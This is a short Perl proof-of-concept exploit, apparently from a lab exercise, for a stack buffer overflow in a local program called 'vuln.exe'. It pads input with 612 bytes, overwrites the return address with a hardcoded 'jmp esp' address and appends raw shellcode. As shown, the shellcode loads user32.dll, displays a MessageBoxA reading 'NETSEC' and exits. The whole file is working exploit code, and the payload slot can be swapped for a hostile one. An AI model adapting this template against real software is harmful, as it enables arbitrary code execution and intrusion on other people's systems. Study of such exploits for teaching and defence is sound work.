#!/usr/bin/perl
#JMP ESP way

$buffer = "A" x 612;

$eip = "\xed\x1e\x93\x7c"; ## -->jmp esp ff e4: 7c931eed";

$shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb".
"\x77\x1d\x80\x7c".  
"\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb".
"\x28\xac\x80\x7c".
"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51".
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff".
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff".
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff".
"\xff\x4e\x45\x54\x53\x45\x43\x4e";
 

$total = $buffer.$eip.$shellcode;

exec("vuln.exe", "$total");

exit();